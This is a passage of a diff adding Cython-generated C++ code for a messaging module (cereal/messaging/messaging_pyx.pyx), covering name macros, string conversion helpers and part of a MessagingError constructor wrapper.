__pyx_n_s_ptr __pyx_mstate_global->__pyx_n_s_ptr +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_s_qualname __pyx_mstate_global->__pyx_n_s_qualname +#define __pyx_n_s_r __pyx_mstate_global->__pyx_n_s_r +#define __pyx_n_s_receive __pyx_mstate_global->__pyx_n_s_receive +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_registerSocket __pyx_mstate_global->__pyx_n_s_registerSocket +#define __pyx_n_s_result __pyx_mstate_global->__pyx_n_s_result +#define __pyx_n_s_s __pyx_mstate_global->__pyx_n_s_s +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_send __pyx_mstate_global->__pyx_n_s_send +#define __pyx_n_s_set __pyx_mstate_global->__pyx_n_s_set +#define __pyx_n_s_setTimeout __pyx_mstate_global->__pyx_n_s_setTimeout +#define __pyx_n_s_set_fake_prefix __pyx_mstate_global->__pyx_n_s_set_fake_prefix +#define __pyx_n_s_set_name __pyx_mstate_global->__pyx_n_s_set_name +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_socket __pyx_mstate_global->__pyx_n_s_socket +#define __pyx_n_s_sockets __pyx_mstate_global->__pyx_n_s_sockets +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_suffix __pyx_mstate_global->__pyx_n_s_suffix +#define __pyx_n_s_super __pyx_mstate_global->__pyx_n_s_super +#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys +#define __pyx_n_s_sz __pyx_mstate_global->__pyx_n_s_sz +#define __pyx_n_s_t __pyx_mstate_global->__pyx_n_s_t +#define __pyx_n_s_term __pyx_mstate_global->__pyx_n_s_term +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_timeout __pyx_mstate_global->__pyx_n_s_timeout +#define __pyx_n_s_toggle_fake_events __pyx_mstate_global->__pyx_n_s_toggle_fake_events +#define __pyx_kp_u_utf_8 __pyx_mstate_global->__pyx_kp_u_utf_8 +#define __pyx_n_s_wait __pyx_mstate_global->__pyx_n_s_wait +#define __pyx_n_s_wait_for_one_event __pyx_mstate_global->__pyx_n_s_wait_for_one_event +#define __pyx_kp_u_with __pyx_mstate_global->__pyx_kp_u_with +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 +#define __pyx_k__3 __pyx_mstate_global->__pyx_k__3 +#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 +#define __pyx_tuple__6 __pyx_mstate_global->__pyx_tuple__6 +#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_tuple__11 __pyx_mstate_global->__pyx_tuple__11 +#define __pyx_tuple__15 __pyx_mstate_global->__pyx_tuple__15 +#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 +#define __pyx_tuple__20 __pyx_mstate_global->__pyx_tuple__20 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__25 __pyx_mstate_global->__pyx_tuple__25 +#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__41 __pyx_mstate_global->__pyx_tuple__41 +#define __pyx_tuple__43 __pyx_mstate_global->__pyx_tuple__43 +#define __pyx_tuple__46 __pyx_mstate_global->__pyx_tuple__46 +#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 +#define __pyx_codeobj__7 __pyx_mstate_global->__pyx_codeobj__7 +#define __pyx_codeobj__10 __pyx_mstate_global->__pyx_codeobj__10 +#define __pyx_codeobj__12 __pyx_mstate_global->__pyx_codeobj__12 +#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 +#define __pyx_codeobj__14 __pyx_mstate_global->__pyx_codeobj__14 +#define __pyx_codeobj__16 __pyx_mstate_global->__pyx_codeobj__16 +#define __pyx_codeobj__18 __pyx_mstate_global->__pyx_codeobj__18 +#define __pyx_codeobj__19 __pyx_mstate_global->__pyx_codeobj__19 +#define __pyx_codeobj__21 __pyx_mstate_global->__pyx_codeobj__21 +#define __pyx_codeobj__23 __pyx_mstate_global->__pyx_codeobj__23 +#define __pyx_codeobj__24 __pyx_mstate_global->__pyx_codeobj__24 +#define __pyx_codeobj__26 __pyx_mstate_global->__pyx_codeobj__26 +#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 +#define __pyx_codeobj__28 __pyx_mstate_global->__pyx_codeobj__28 +#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 +#define __pyx_codeobj__30 __pyx_mstate_global->__pyx_codeobj__30 +#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 +#define __pyx_codeobj__33 __pyx_mstate_global->__pyx_codeobj__33 +#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 +#define __pyx_codeobj__36 __pyx_mstate_global->__pyx_codeobj__36 +#define __pyx_codeobj__37 __pyx_mstate_global->__pyx_codeobj__37 +#define __pyx_codeobj__39 __pyx_mstate_global->__pyx_codeobj__39 +#define __pyx_codeobj__40 __pyx_mstate_global->__pyx_codeobj__40 +#define __pyx_codeobj__42 __pyx_mstate_global->__pyx_codeobj__42 +#define __pyx_codeobj__44 __pyx_mstate_global->__pyx_codeobj__44 +#define __pyx_codeobj__45 __pyx_mstate_global->__pyx_codeobj__45 +#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 +#define __pyx_codeobj__49 __pyx_mstate_global->__pyx_codeobj__49 +#define __pyx_codeobj__50 __pyx_mstate_global->__pyx_codeobj__50 +#define __pyx_codeobj__51 __pyx_mstate_global->__pyx_codeobj__51 +#define __pyx_codeobj__52 __pyx_mstate_global->__pyx_codeobj__52 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyObject_string_to_py_std__in_string", 0); + + /* "string.to_py":32 + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyUnicode_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyObject_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyUnicode_string_to_py_std__in_string", 0); + + /* "string.to_py":38 + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyStr_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyUnicode_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyUnicode_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyStr_string_to_py_std__in_string", 0); + + /* "string.to_py":44 + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyBytes_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyStr_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyStr_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyBytes_string_to_py_std__in_string", 0); + + /* "string.to_py":50 + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyByteArray_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyBytes_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyByteArray_string_to_py_std__in_string", 0); + + /* "string.to_py":56 + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyByteArray_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyByteArray_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":22 + * + * class MessagingError(Exception): + * def __init__(self, endpoint=None): # <<<<<<<<<<<<<< + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_14MessagingError_1__init__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_14MessagingError_1__init__ = {"__init__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_14MessagingError_1__init__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_14MessagingError_1__init__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + PyObject *__pyx_v_endpoint = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,&__pyx_n_s_endpoint,0}; + PyObject* values[2] = {0,0}; + values[1] = ((PyObject *)((PyObject *)Py_None)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 22, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_endpoint); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 22, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 22, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_self = values[0]; + __pyx_v_endpoint = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 0, 1, 2, __pyx_nargs); __PYX_ERR(0, 22, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.MessagingError.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_14MessagingError___init__(__pyx_self, __pyx_v_self, __pyx_v_endpoint); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_14MessagingError___init__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self, PyObject *__pyx_v_endpoint) { + PyObject *__pyx_v_suffix = NULL; + PyObject *__pyx_v_message = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + Py_UCS4 __pyx_t_8; + char *__pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":23 + * class MessagingError(Exception): + * def __init__(self, endpoint=None): + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" # <<<<<<<<<<<<<< + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + * super().__init__(message) + */ + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_v_endpoint); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 23, __pyx_L1_error) + if (__pyx_t_2) { + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_endpoint, __pyx_n_s_decode); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_kp_u_utf_8}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_t_3, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyUnicode_Concat(__pyx_kp_u_with, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } else { + __Pyx_INCREF(__pyx_kp_u_); + __pyx_t_1 = __pyx_kp_u_; + } + __pyx_v_suffix = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":24 + * def __init__(self, endpoint=None): + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" # <<<<<<<<<<<<<< + * super().__init__(message) + * + */ + __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = 0; + __pyx_t_8 = 127; + __Pyx_INCREF(__pyx_kp_u_Messaging_failure); + __pyx_t_7 += 18; + __Pyx_GIVEREF(__pyx_kp_u_Messaging_failure); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_kp_u_Messaging_failure); + __pyx_t_3 = __Pyx_PyUnicode_Unicode(__pyx_v_suffix); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_3) > __pyx_t_8) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_3) : __pyx_t_8; + __pyx_t_7 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_7 += 2; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_kp_u__2); + __pyx_t_9 = strerror(errno); + __pyx_t_3 = __Pyx_decode_c_string(__pyx_t_9, 0, strlen(__pyx_t_9), NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __pyx_t_8 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_3) > __pyx_t_8) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_3) : __pyx_t_8; + __pyx_t_7 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyUnicode_Join(__pyx_t_1, 4, __pyx_t_7, __pyx_t_8); if 